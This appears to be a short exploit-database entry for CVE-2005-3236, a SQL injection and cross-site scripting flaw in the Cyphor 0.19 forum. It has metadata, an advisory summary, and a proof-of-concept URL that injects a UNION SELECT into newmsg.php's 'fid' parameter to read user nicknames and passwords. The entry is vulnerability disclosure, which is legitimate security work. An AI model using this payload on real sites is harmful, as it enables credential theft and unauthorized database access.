[] NeoSense

Cyphor 0.19 - 'newmsg.php?fid' SQL Injection

Author: retrogod@aliceposta.it
type: webapps
platform: php
port: 
date_added: 2005-10-08 
date_updated: 2013-06-20 
verified: 1 
codes: CVE-2005-3236;OSVDB-19944 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/15047/info

Cyphor is prone to multiple cross-site scripting and SQL injection vulnerabilities.

Exploitation could allow for theft of cookie-based authentication credentials or unauthorized access to database data. Other attacks are also possible.

http://www.example.com/[path]/newmsg.php?fid=''%20UNION%20SELECT%20nick,%20password,%20null,%20null%20FROM%20[table_pr\efix]users%20/*